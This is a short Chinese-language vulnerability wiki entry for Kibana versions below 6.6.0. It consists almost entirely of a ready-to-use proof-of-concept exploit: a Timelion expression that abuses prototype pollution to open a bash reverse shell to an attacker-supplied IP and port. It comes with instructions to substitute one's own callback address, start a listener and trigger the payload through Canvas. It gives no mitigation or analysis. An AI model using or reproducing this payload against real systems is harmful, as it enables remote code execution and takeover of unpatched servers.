pwnwiki.com
,
影响版本
kibana<6.6.0
POC
将POC里的反链IP地址换成自己的,然后在目标机器上的 Timelion 选项下将以下 POC 粘贴进去,点击 Run 运行
.es(*).props(label.__proto__.env.AAAA='require("child_process").exec("bash -i >& /dev/tcp/10.10.20.166/8989 0>&1");process.exit()//')
.props(label.__proto__.env.NODE_OPTIONS='--require /proc/self/environ')
攻击机器开启监听,点击 Canvas 即可触发漏洞。
免费、自由、人人可编辑的漏洞库--pwnwiki.com
